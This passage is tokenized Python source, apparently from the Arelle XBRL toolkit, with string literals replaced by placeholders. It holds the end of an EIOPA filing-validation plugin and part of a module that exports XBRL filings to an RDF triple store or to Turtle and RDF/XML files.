) or <EOL> ( not val . isEIOPAfullVersion and _scheme == "<STR_LIT>" ) ) : <EOL> result = LeiUtil . checkLei ( _LEI ) <EOL> if result == LeiUtil . LEI_INVALID_LEXICAL : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , lei = _LEI ) <EOL> elif result == LeiUtil . LEI_INVALID_CHECKSUM : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , lei = _LEI ) <EOL> if _scheme == "<STR_LIT>" : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , scheme = _scheme ) <EOL> elif _scheme == "<STR_LIT>" : <EOL> pass <EOL> else : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , scheme = _scheme ) <EOL> if val . unusedUnitIDs : <EOL> if val . isEIOPA_2_0_1 : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . units [ unusedUnitID ] for unusedUnitID in val . unusedUnitIDs if unusedUnitID in modelXbrl . units ] , <EOL> unusedUnitIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedUnitIDs ) ) ) <EOL> else : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . units [ unusedUnitID ] for unusedUnitID in val . unusedUnitIDs if unusedUnitID in modelXbrl . units ] , <EOL> unusedUnitIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedUnitIDs ) ) ) <EOL> if len ( val . currenciesUsed ) > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = val . currenciesUsed . values ( ) , numCurrencies = len ( val . currenciesUsed ) , currencies = "<STR_LIT:U+002CU+0020>" . join ( str ( c ) for c in val . currenciesUsed . keys ( ) ) ) <EOL> elif val . isEIOPA_2_0_1 and any ( _measure . localName != val . reportingCurrency for _measure in val . currenciesUsed . keys ( ) ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = val . currenciesUsed . values ( ) , reportingCurrency = val . reportingCurrency , currencies = "<STR_LIT:U+002CU+0020>" . join ( str ( c ) for c in val . currenciesUsed . keys ( ) ) ) <EOL> if val . prefixesUnused : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , unusedPrefixes = '<STR_LIT:U+002CU+0020>' . join ( sorted ( val . prefixesUnused ) ) ) <EOL> for ns , prefixes in val . namespacePrefixesUsed . items ( ) : <EOL> nsDocs = modelXbrl . namespaceDocs . get ( ns ) <EOL> if nsDocs : <EOL> for nsDoc in nsDocs : <EOL> nsDocPrefix = XmlUtil . xmlnsprefix ( nsDoc . xmlRootElement , ns ) <EOL> if any ( prefix != nsDocPrefix for prefix in prefixes if prefix is not None ) : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , namespace = ns , declaredPrefix = nsDocPrefix , foundPrefixes = '<STR_LIT:U+002CU+0020>' . join ( sorted ( prefixes - { None } ) ) ) <EOL> elif ns in CANONICAL_PREFIXES and any ( prefix != CANONICAL_PREFIXES [ ns ] for prefix in prefixes if prefix is not None ) : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , namespace = ns , declaredPrefix = CANONICAL_PREFIXES [ ns ] , foundPrefixes = '<STR_LIT:U+002CU+0020>' . join ( sorted ( prefixes - { None } ) ) ) <EOL> modelXbrl . profileActivity ( _statusMsg , minTimeToShow = <NUM_LIT:0.0> ) <EOL> modelXbrl . modelManager . showStatus ( None ) <EOL> del val . prefixNamespace , val . namespacePrefix , val . idObjects , val . typedDomainElements <EOL> del val . utrValidator , val . firstFact , val . footnotesRelationshipSet <EOL> __pluginInfo__ = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dislosureSystemTypes , <EOL> '<STR_LIT>' : disclosureSystemConfigURL , <EOL> '<STR_LIT>' : validateSetup , <EOL> '<STR_LIT>' : validateNonStreamingFinish , <EOL> '<STR_LIT>' : validateStreamingFacts , <EOL> '<STR_LIT>' : validateStreamingFinish , <EOL> } </s>
<s> '''<STR_LIT>''' <EOL> import os , io , time , json , socket , logging , zlib , datetime <EOL> from arelle . ModelDtsObject import ModelConcept , ModelResource , ModelRelationship <EOL> from arelle . ModelInstanceObject import ModelFact <EOL> from arelle . ModelDocument import Type <EOL> from arelle import XbrlConst , XmlUtil , UrlUtil <EOL> import urllib . request <EOL> from urllib . error import HTTPError , URLError <EOL> from lxml import etree <EOL> TRACERDFFILE = None <EOL> RDFTURTLEFILE_HOSTNAME = "<STR_LIT>" <EOL> RDFXMLFILE_HOSTNAME = "<STR_LIT>" <EOL> def insertIntoDB ( modelXbrl , <EOL> user = None , password = None , host = None , port = None , database = None , timeout = None , <EOL> product = None , rssItem = None , ** kwargs ) : <EOL> rdfdb = None <EOL> try : <EOL> rdfdb = XbrlSemanticRdfDatabaseConnection ( modelXbrl , user , password , host , port , database , timeout ) <EOL> rdfdb . insertXbrl ( rssItem = rssItem ) <EOL> rdfdb . close ( ) <EOL> except Exception as ex : <EOL> if rdfdb is not None : <EOL> try : <EOL> rdfdb . close ( rollback = True ) <EOL> except Exception as ex2 : <EOL> pass <EOL> raise <EOL> def isDBPort ( host , port , db , timeout = <NUM_LIT:10> ) : <EOL> if host in ( RDFTURTLEFILE_HOSTNAME , RDFXMLFILE_HOSTNAME ) : <EOL> return True <EOL> t = <NUM_LIT:2> <EOL> while t < timeout : <EOL> try : <EOL> conn = urllib . request . urlopen ( "<STR_LIT>" . format ( host , port or '<STR_LIT>' , db ) ) <EOL> return True <EOL> except HTTPError : <EOL> return False <EOL> except URLError : <EOL> return False <EOL> except socket . timeout : <EOL> t = t + <NUM_LIT:2> <EOL> return False <EOL> Namespace = URIRef = Literal = Graph = L = XSD = RDF = RDFS = None <EOL> DEFAULT_GRAPH_CLASS = None <EOL> XML = XBRL = XBRLI = LINK = QName = Filing = DTS = Aspect = AspectType = None <EOL> DocumentTypes = RoleType = ArcRoleType = Relationship = ArcRoleCycles = None <EOL> DataPoint = Context = Period = Unit = None <EOL> SEC = None <EOL> def initRdflibNamespaces ( ) : <EOL> global Namespace , URIRef , Literal , Graph , L , XSD , RDF , RDFS , DEFAULT_GRAPH_CLASS <EOL> if Namespace is None : <EOL> from rdflib import Namespace , URIRef , Literal , Graph <EOL> from rdflib import Literal as L <EOL> from rdflib . namespace import XSD , RDF , RDFS <EOL> DEFAULT_GRAPH_CLASS = Graph <EOL> global XML , XBRL , XBRLI , LINK , QName , Filing , DTS , Aspect , AspectType , DocumentTypes , RoleType , ArcRoleType , Relationship , ArcRoleCycles , DataPoint , Context , Period , Unit , SEC <EOL> if XML is None : <EOL> XML = Namespace ( "<STR_LIT>" ) <EOL> XBRL = Namespace ( "<STR_LIT>" ) <EOL> XBRLI = Namespace ( "<STR_LIT>" ) <EOL> LINK = Namespace ( "<STR_LIT>" ) <EOL> QName = Namespace ( "<STR_LIT>" ) <EOL> Filing = Namespace ( "<STR_LIT>" ) <EOL> DTS = Namespace ( "<STR_LIT>" ) <EOL> DocumentTypes = { Type . INSTANCE : XBRL . Instance , <EOL> Type . INLINEXBRL : XBRL . InlineHtml , <EOL> Type . SCHEMA : XBRL . Schema , <EOL> Type . LINKBASE : XBRL . Linkbase , <EOL> Type . UnknownXML : XML . Document } <EOL> Aspect = Namespace ( "<STR_LIT>" ) <EOL> AspectType = Namespace ( "<STR_LIT>" ) <EOL> RoleType = Namespace ( "<STR_LIT>" ) <EOL> ArcRoleType = Namespace ( "<STR_LIT>" ) <EOL> Relationship = Namespace ( "<STR_LIT>" ) <EOL> ArcRoleCycles = Namespace ( "<STR_LIT>" ) <EOL> DataPoint = Namespace ( "<STR_LIT>" ) <EOL> Context = Namespace ( "<STR_LIT>" ) <EOL> Period = Namespace ( "<STR_LIT>" ) <EOL> Unit = Namespace ( "<STR_LIT>" ) <EOL> SEC = Namespace ( "<STR_LIT>" ) <EOL> def modelObjectDocumentUri ( modelObject ) : <EOL> return URIRef ( UrlUtil . ensureUrl ( modelObject . modelDocument . uri ) ) <EOL> def modelObjectUri ( modelObject ) : <EOL> return URIRef ( '<STR_LIT:#>' . join ( ( modelObjectDocumentUri ( modelObject ) , <EOL> XmlUtil . elementFragmentIdentifier ( modelObject ) ) ) ) <EOL> def qnameUri ( qname , sep = '<STR_LIT:#>' ) : <EOL> return URIRef ( sep . join ( ( qname . namespaceURI , qname . localName ) ) ) <EOL> def qnamePrefix_Name ( qname , sep = '<STR_LIT:_>' ) : <EOL> prefix = { XbrlConst . xsd : '<STR_LIT>' , <EOL> XbrlConst . xml : '<STR_LIT>' , <EOL> XbrlConst . xbrli : '<STR_LIT>' , <EOL> XbrlConst . link : '<STR_LIT>' , <EOL> XbrlConst . gen : '<STR_LIT>' , <EOL> XbrlConst . xlink : '<STR_LIT>' <EOL> } . get ( qname . namespaceURI , qname . prefix ) <EOL> return L ( sep . join ( ( prefix , qname . localName ) ) ) <EOL> def modelObjectQnameUri ( modelObject , sep = '<STR_LIT:#>' ) : <EOL> return qnameUri ( modelObject . qname , sep ) <EOL> class XRDBException ( Exception ) : <EOL> def __init__ ( self , code , message , ** kwargs ) : <EOL> self . code = code <EOL> self . message = message <EOL> self . kwargs = kwargs <EOL> self . args = ( self . __repr__ ( ) , ) <EOL> def __repr__ ( self ) : <EOL> return _ ( '<STR_LIT>' ) . format ( self . code , self . message % self . kwargs ) <EOL> class XbrlSemanticRdfDatabaseConnection ( ) : <EOL> def __init__ ( self , modelXbrl , user , password , host , port , database , timeout ) : <EOL> try : <EOL> initRdflibNamespaces ( ) <EOL> except ImportError : <EOL> raise XRDBException ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) ) <EOL> self . modelXbrl = modelXbrl <EOL> self . disclosureSystem = modelXbrl . modelManager . disclosureSystem <EOL> self . isRdfTurtleFile = host == RDFTURTLEFILE_HOSTNAME <EOL> self . isRdfXmlFile = host == RDFXMLFILE_HOSTNAME <EOL> if self . isRdfTurtleFile or self . isRdfXmlFile : <EOL> self . turtleFile = database <EOL> else : <EOL> connectionUrl = "<STR_LIT>" . format ( host , port or '<STR_LIT>' ) <EOL> self . url = connectionUrl <EOL> if database : <EOL> self . url += '<STR_LIT:/>' + database <EOL> auth_handler = urllib . request . HTTPBasicAuthHandler ( ) <EOL> if user : <EOL> auth_handler . add_password ( realm = None , <EOL> uri = connectionUrl , <EOL> user = user , <EOL> passwd = password ) <EOL> self . conn = urllib . request . build_opener ( auth_handler ) <EOL> self . timeout = timeout or <NUM_LIT> <EOL> self . verticePropTypes = { } <EOL> def close ( self , rollback = False ) : <EOL> try : <EOL> if not ( self . isRdfTurtleFile or self . isRdfXmlFile ) : <EOL> self . conn . close ( ) <EOL> self . __dict__ . clear ( ) <EOL> except Exception as ex : <EOL> self . __dict__ . clear ( ) <EOL> raise <EOL> @ property <EOL> def isClosed ( self ) : <EOL> return not bool ( self . __dict__ ) <EOL> def showStatus ( self , msg , clearAfter = None ) : <EOL> self . modelXbrl . modelManager . showStatus ( msg , clearAfter ) <EOL> def initializeGraph ( self , graph = None ) : <EOL> g = graph or DEFAULT_GRAPH_CLASS ( ) <EOL> g . bind ( "<STR_LIT>" , XML ) <EOL> g . bind ( "<STR_LIT>" , XBRL ) <EOL> g . bind ( "<STR_LIT>" , XBRLI ) <EOL> g . bind ( "<STR_LIT>" , LINK ) <EOL> g . bind ( "<STR_LIT>" , QName ) <EOL> g . bind ( "<STR_LIT>" , Filing ) <EOL> g . bind ( "<STR_LIT>" , DTS ) <EOL> g . bind ( "<STR_LIT>" , Aspect ) <EOL> g . bind ( "<STR_LIT>" , AspectType ) <EOL> g . bind ( "<STR_LIT>" , RoleType ) <EOL> g . bind ( "<STR_LIT>" , ArcRoleType ) <EOL> g . bind ( "<STR_LIT>" , ArcRoleCycles ) <EOL> g . bind ( "<STR_LIT>" , Relationship ) <EOL> g . bind ( "<STR_LIT>" , DataPoint ) <EOL> g . bind ( "<STR_LIT>" , Context ) <EOL> g . bind ( "<STR_LIT>" , Period ) <EOL> g . bind ( "<STR_LIT>" , Unit ) <EOL> g . bind ( "<STR_LIT>" , SEC ) <EOL> return g <EOL> def execute ( self , activity , graph = None , query = None ) : <EOL> if graph is not None : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:Content-Type>' : "<STR_LIT>" } <EOL> data = graph . serialize ( format = '<STR_LIT>' if self . isRdfXmlFile else '<STR_LIT>' , <EOL> encoding = '<STR_LIT>' ) <EOL> elif query is not None : <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> data = ( "<STR_LIT>" + query ) . encode ( '<STR_LIT:utf-8>' ) <EOL> else : <EOL> return None <EOL> if TRACERDFFILE : <EOL> with io . open ( TRACERDFFILE , "<STR_LIT>" ) as fh : <EOL> fh . write ( b"<STR_LIT>" ) <EOL> fh . write ( data ) <EOL> if ( self . isRdfTurtleFile or self . isRdfXmlFile ) and data is not None : <EOL> with io . open ( self . turtleFile , "<STR_LIT>" ) as fh : <EOL> fh . write ( data ) <EOL> return None <EOL> if graph is not None or query is not None : <EOL> url = self . url + "<STR_LIT>" <EOL> request = urllib . request . Request ( url , <EOL> data = data , <EOL> headers = headers ) <EOL> try : <EOL> with self . conn . open ( request , timeout = self . timeout ) as fp : <EOL> results = fp . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> try : <EOL> results = json . loads ( results ) <EOL> except ValueError : <EOL> pass <EOL> except HTTPError as err : <EOL> results = err . fp . read ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> if TRACERDFFILE : <EOL> with io . open ( TRACERDFFILE , "<STR_LIT:a>" , encoding = '<STR_LIT:utf-8>' ) as fh : <EOL> fh . write ( "<STR_LIT>" . format ( str ( results ) ) ) <EOL> if isinstance ( results , str ) and query is not None : <EOL> parser = etree . HTMLParser ( ) <EOL> htmlDoc = etree . parse ( io . StringIO ( results ) , parser ) <EOL> body = htmlDoc . find ( "<STR_LIT>" ) <EOL> if body is not None : <EOL> error = "<STR_LIT>" . join ( text for text in body . itertext ( ) ) <EOL> else : <EOL> error = results <EOL> raise XRDBException ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> activity = activity , error = error ) <EOL> return results <EOL> def commit ( self , graph ) : <EOL> self . execute ( "<STR_LIT>" , graph = graph ) <EOL> def loadGraphRootVertices ( self ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> pass <EOL> def getDBsize ( self ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> def insertXbrl ( self , rssItem ) : <EOL> try : <EOL> from arelle import ValidateXbrlDimensions <EOL> ValidateXbrlDimensions . loadDimensionDefaults ( self . modelXbrl ) <EOL> startedAt = time . time ( ) <EOL> self . identifyPreexistingDocuments ( ) <EOL> g = self . initializeGraph ( ) <EOL> self . insertSchema ( g ) <EOL> self . insertFiling ( rssItem , g ) <EOL> self . insertDocuments ( g ) <EOL> self . insertDataDictionary ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> startedAt = time . time ( ) <EOL> self . insertDataPoints ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> startedAt = time . time ( ) <EOL> self . insertRelationshipSets ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> self . insertValidationResults ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> self . commit ( g ) <EOL> self . modelXbrl . profileStat ( _ ( "<STR_LIT>" ) , time . time ( ) - startedAt ) <EOL> self . showStatus ( "<STR_LIT>" , clearAfter = <NUM_LIT> ) <EOL> except Exception as ex : <EOL> self . showStatus ( "<STR_LIT>" , clearAfter = <NUM_LIT> ) <EOL> raise <EOL> def insertSchema ( self , g ) : <EOL> if True : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> g . add ( ( XML . QName , RDF . type , RDFS . Class ) ) <EOL> g . add ( ( XBRL . Filing , RDF . type , RDFS . Class ) ) <EOL> g . add ( ( XML . Document , RDF . type , RDFS . Class ) ) <EOL> g . add ( ( XBRL . Schema , RDFS . subClassOf , XML . Document ) ) <EOL> g . add ( ( XBRL . Linkbase , RDFS . subClassOf , XML . Document ) ) <EOL> g . add ( ( XBRL . Instance , RDFS . subClassOf , XML . Document ) ) <EOL> g . add ( ( XBRL . InlineHtml , RDFS . subClassOf , XML . Document ) ) <EOL> def insertFiling ( self , rssItem , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> new_filing = { } <EOL> if self . modelXbrl . modelDocument . creationSoftwareComment : <EOL> new_filing [ '<STR_LIT>' ] = self . modelXbrl . modelDocument . creationSoftwareComment <EOL> datetimeNow = datetime . datetime . now ( ) <EOL> datetimeNowStr = XmlUtil . dateunionValue ( datetimeNow ) <EOL> entryUri = URIRef ( modelObjectDocumentUri ( self . modelXbrl ) ) <EOL> if rssItem is not None : <EOL> filingType = "<STR_LIT>" <EOL> new_filing [ '<STR_LIT>' ] = filingNumber = rssItem . accessionNumber <EOL> new_filing [ '<STR_LIT>' ] = XmlUtil . dateunionValue ( rssItem . acceptanceDatetime ) <EOL> new_filing [ '<STR_LIT>' ] = XmlUtil . dateunionValue ( rssItem . filingDate ) <EOL> new_filing [ '<STR_LIT>' ] = rssItem . cikNumber <EOL> new_filing [ '<STR_LIT>' ] = rssItem . companyName <EOL> new_filing [ '<STR_LIT>' ] = rssItem . assignedSic <EOL> new_filing [ '<STR_LIT>' ] = rssItem . htmlUrl <EOL> new_filing [ '<STR_LIT>' ] = URIRef ( rssItem . url ) <EOL> self . filingDTS = rssItem . htmlUrl <EOL> self . filingURI = URIRef ( self . filingDTS ) <EOL> else : <EOL> intNow = int ( time . time ( ) ) <EOL> new_filing [ '<STR_LIT>' ] = filingNumber = str ( intNow ) <EOL> self . filingId = int ( time . time ( ) ) <EOL> filingType = "<STR_LIT>" <EOL> new_filing [ '<STR_LIT>' ] = datetimeNowStr <EOL> new_filing [ '<STR_LIT>' ] = datetimeNowStr <EOL> new_filing [ '<STR_LIT>' ] = URIRef ( UrlUtil . ensureUrl ( self . modelXbrl . fileSource . url ) ) <EOL> self . filingDTS = Filing [ filingNumber ] <EOL> self . filingURI = URIRef ( self . filingDTS ) <EOL> g . add ( ( self . filingURI , RDF . type , XBRL . Filing ) ) <EOL> for n , v in new_filing . items ( ) : <EOL> g . add ( ( self . filingURI , Filing [ n ] , L ( v ) ) ) <EOL> self . reportURI = URIRef ( modelObjectDocumentUri ( self . modelXbrl ) ) <EOL> g . add ( ( self . reportURI , RDF . type , XBRL . Report ) ) <EOL> g . add ( ( self . filingURI , Filing . report , self . reportURI ) ) <EOL> g . add ( ( self . reportURI , Filing . filing , self . filingURI ) ) <EOL> self . relationshipSets = [ ( arcrole , ELR , linkqname , arcqname ) <EOL> for arcrole , ELR , linkqname , arcqname in self . modelXbrl . baseSets . keys ( ) <EOL> if ELR and ( arcrole . startswith ( "<STR_LIT>" ) or ( linkqname and arcqname ) ) ] <EOL> def identifyPreexistingDocuments ( self ) : <EOL> self . existingDocumentUris = set ( ) <EOL> if not ( self . isRdfTurtleFile or self . isRdfXmlFile ) : <EOL> docFilters = [ ] <EOL> for modelDocument in self . modelXbrl . urlDocs . values ( ) : <EOL> if modelDocument . type == Type . SCHEMA : <EOL> docFilters . append ( '<STR_LIT>' . format ( UrlUtil . ensureUrl ( modelDocument . uri ) ) ) <EOL> results = self . execute ( <EOL> "<STR_LIT>" , <EOL> query = """<STR_LIT>""" + '<STR_LIT>' . join ( docFilters ) + "<STR_LIT>" ) <EOL> try : <EOL> for result in results [ '<STR_LIT>' ] [ '<STR_LIT>' ] : <EOL> doc = result [ '<STR_LIT>' ] <EOL> if doc . get ( '<STR_LIT:type>' ) == '<STR_LIT>' : <EOL> self . existingDocumentUris . add ( doc [ '<STR_LIT:value>' ] ) <EOL> except KeyError : <EOL> pass <EOL> def insertDocuments ( self , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> documents = [ ] <EOL> for modelDocument in self . modelXbrl . urlDocs . values ( ) : <EOL> docUri = URIRef ( modelObjectDocumentUri ( modelDocument ) ) <EOL> if UrlUtil . ensureUrl ( modelDocument . uri ) not in self . existingDocumentUris : <EOL> g . add ( ( docUri , RDF . type , XBRL . Document ) ) <EOL> g . add ( ( docUri , XBRL . url , docUri ) ) <EOL> g . add ( ( docUri , XBRL . documentType , DocumentTypes . get ( modelDocument . type , <EOL> DocumentTypes . get ( Type . UnknownXML ) ) ) ) <EOL> for doc , ref in modelDocument . referencesDocument . items ( ) : <EOL> if doc . inDTS and ref . referenceType in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> g . add ( ( docUri , XBRL . references , URIRef ( modelObjectDocumentUri ( doc ) ) ) ) <EOL> g . add ( ( self . filingURI , Filing . document , docUri ) ) <EOL> if modelDocument . uri == self . modelXbrl . modelDocument . uri : <EOL> g . add ( ( self . reportURI , DTS . EntryPoint , docUri ) ) <EOL> def conceptsUsed ( self ) : <EOL> conceptsUsed = set ( f . qname for f in self . modelXbrl . factsInInstance ) <EOL> for cntx in self . modelXbrl . contexts . values ( ) : <EOL> for dim in cntx . qnameDims . values ( ) : <EOL> conceptsUsed . add ( dim . dimensionQname ) <EOL> if dim . isExplicit : <EOL> conceptsUsed . add ( dim . memberQname ) <EOL> else : <EOL> conceptsUsed . add ( dim . typedMember . qname ) <EOL> for defaultDim , defaultDimMember in self . modelXbrl . qnameDimensionDefaults . items ( ) : <EOL> conceptsUsed . add ( defaultDim ) <EOL> conceptsUsed . add ( defaultDimMember ) <EOL> for roleTypes in ( self . modelXbrl . roleTypes , self . modelXbrl . arcroleTypes ) : <EOL> for modelRoleTypes in roleTypes . values ( ) : <EOL> for modelRoleType in modelRoleTypes : <EOL> for qn in modelRoleType . usedOns : <EOL> conceptsUsed . add ( qn ) <EOL> for relationshipSetKey in self . relationshipSets : <EOL> relationshipSet = self . modelXbrl . relationshipSet ( * relationshipSetKey ) <EOL> for rel in relationshipSet . modelRelationships : <EOL> if isinstance ( rel . fromModelObject , ModelConcept ) : <EOL> conceptsUsed . add ( rel . fromModelObject ) <EOL> if isinstance ( rel . toModelObject , ModelConcept ) : <EOL> conceptsUsed . add ( rel . toModelObject ) <EOL> for qn in ( XbrlConst . qnXbrliIdentifier , XbrlConst . qnXbrliPeriod , XbrlConst . qnXbrliUnit ) : <EOL> conceptsUsed . add ( qn ) <EOL> conceptsUsed -= { None } <EOL> return conceptsUsed <EOL> def insertDataDictionary ( self , g ) : <EOL> self . type_id = { } <EOL> self . aspect_id = { } <EOL> self . aspect_proxy_uri = { } <EOL> self . roleType_id = { } <EOL> self . arcroleType_id = { } <EOL> '''<STR_LIT>''' <EOL> conceptsUsed = self . conceptsUsed ( ) <EOL> for modelDocument in self . modelXbrl . urlDocs . values ( ) : <EOL> self . showStatus ( "<STR_LIT>" + modelDocument . basename ) <EOL> if modelDocument . type == Type . SCHEMA : <EOL> isNewDocument = True <EOL> modelConcepts = [ modelConcept <EOL> for modelConcept in self . modelXbrl . qnameConcepts . values ( ) <EOL> if modelConcept . modelDocument is modelDocument and <EOL> ( isNewDocument or modelConcept in conceptsUsed ) ] <EOL> if UrlUtil . ensureUrl ( modelDocument . uri ) not in self . existingDocumentUris : <EOL> for modelType in self . modelXbrl . qnameTypes . values ( ) : <EOL> if modelType . modelDocument is modelDocument : <EOL> typeUri = modelObjectUri ( modelType ) <EOL> typeQnameUri = qnameUri ( modelType ) <EOL> docUri = modelObjectDocumentUri ( modelType ) <EOL> g . add ( ( docUri , XBRL . dataType , typeUri ) ) <EOL> g . add ( ( typeUri , XBRL . document , docUri ) ) <EOL> g . add ( ( typeUri , RDF . type , XBRL . DataType ) ) <EOL> g . add ( ( typeUri , RDF . type , XBRL . QName ) ) <EOL> g . add ( ( typeUri , QName . namespace , L ( modelDocument . targetNamespace ) ) ) <EOL> g . add ( ( typeUri , QName . localName , L ( modelType . name ) ) ) <EOL> xbrliBaseType = modelType . baseXbrliTypeQname <EOL> if not isinstance ( xbrliBaseType , ( tuple , list ) ) : <EOL> xbrliBaseType = ( xbrliBaseType , ) <EOL> for baseType in xbrliBaseType : <EOL> if baseType is not None : <EOL> baseTypeUri = qnameUri ( baseType ) <EOL> g . add ( ( typeUri , <EOL> AspectType . baseXbrliType , <EOL> baseTypeUri ) ) <EOL> if baseType . namespaceURI == "<STR_LIT>" : <EOL> g . add ( ( typeUri , AspectType . baseXsdType , baseTypeUri ) ) <EOL> typeDerivedFrom = modelType . typeDerivedFrom <EOL> if not isinstance ( typeDerivedFrom , ( tuple , list ) ) : <EOL> typeDerivedFrom = ( typeDerivedFrom , ) <EOL> for dt in typeDerivedFrom : <EOL> if dt is not None : <EOL> dtUri = modelObjectUri ( dt ) <EOL> g . add ( ( typeUri , AspectType . derivedFrom , dtUri ) ) <EOL> for prop in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> propertyValue = getattr ( modelType , prop , None ) <EOL> if propertyValue : <EOL> g . add ( ( typeUri , AspectType [ prop ] , L ( propertyValue ) ) ) <EOL> conceptAspects = [ ] <EOL> for modelConcept in modelConcepts : <EOL> conceptUri = modelObjectUri ( modelConcept ) <EOL> conceptQnameUri = modelObjectQnameUri ( modelConcept ) <EOL> docUri = modelObjectDocumentUri ( modelConcept ) <EOL> g . add ( ( docUri , XBRL . aspect , conceptUri ) ) <EOL> g . add ( ( conceptUri , XBRL . document , docUri ) ) <EOL> g . add ( ( conceptUri , RDF . type , XBRL . Aspect ) ) <EOL> g . add ( ( conceptUri , RDF . type , XBRL . QName ) ) <EOL> g . add ( ( conceptUri , QName . namespace , L ( modelConcept . qname . namespaceURI ) ) ) <EOL> g . add ( ( conceptUri , QName . localName , L ( modelConcept . qname . localName ) ) ) <EOL> g . add ( ( conceptUri , Aspect . isAbstract , L ( modelConcept . isAbstract ) ) ) <EOL> if modelConcept . periodType : <EOL> g . add ( ( conceptUri , Aspect . periodType , L ( modelConcept . periodType ) ) ) <EOL> if modelConcept . balance : <EOL> g . add ( ( conceptUri , Aspect . balance , L ( modelConcept . balance ) ) ) <EOL> for prop in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> propertyValue = getattr ( modelConcept , prop , None ) <EOL> if propertyValue : <EOL> g . add ( ( conceptUri , Aspect [ prop ] , L ( propertyValue ) ) ) <EOL> conceptType = modelConcept . type <EOL> if conceptType is not None : <EOL> typeUri = modelObjectUri ( conceptType ) <EOL> g . add ( ( conceptUri , XBRL . dataType , typeUri ) ) <EOL> substitutionGroup = modelConcept . substitutionGroup <EOL> if substitutionGroup is not None : <EOL> sgUri = modelObjectUri ( substitutionGroup ) <EOL> g . add ( ( conceptUri , XBRL . substitutionGroup , sgUri ) ) <EOL> for modelRoleTypes in self . modelXbrl . roleTypes . values ( ) : <EOL> for modelRoleType in modelRoleTypes : <EOL> rtUri = modelObjectUri ( modelRoleType ) <EOL> docUri = modelObjectDocumentUri ( modelRoleType ) <EOL> g . add ( ( docUri , XBRL . roleType , rtUri ) ) <EOL> g . add ( ( rtUri , XBRL . document , docUri ) ) <EOL> g . add ( ( rtUri , RDF . type , DTS . RoleType ) ) <EOL> g . add ( ( rtUri , RoleType . roleUri , URIRef ( modelRoleType . roleURI ) ) ) <EOL> g . add ( ( rtUri , RoleType . definition , L ( modelRoleType . definition ) ) ) <EOL> for qn in modelRoleType . usedOns : <EOL> usedOnConcept = self . modelXbrl . qnameConcepts [ qn ] <EOL> g . add ( ( rtUri , RoleType . usedOn , modelObjectUri ( usedOnConcept ) ) ) <EOL> for modelArcroleTypes in self . modelXbrl . arcroleTypes . values ( ) : <EOL> for modelArcroleType in modelArcroleTypes : <EOL> rt_uri = modelObjectUri ( modelArcroleType ) <EOL> doc_uri = modelObjectDocumentUri ( modelArcroleType ) <EOL> g . add ( ( doc_uri , XBRL . arcroleType , rt_uri ) ) <EOL> g . add ( ( rtUri , XBRL . document , docUri ) ) <EOL> g . add ( ( rt_uri , RDF . type , DTS . ArcRoleType ) ) <EOL> g . 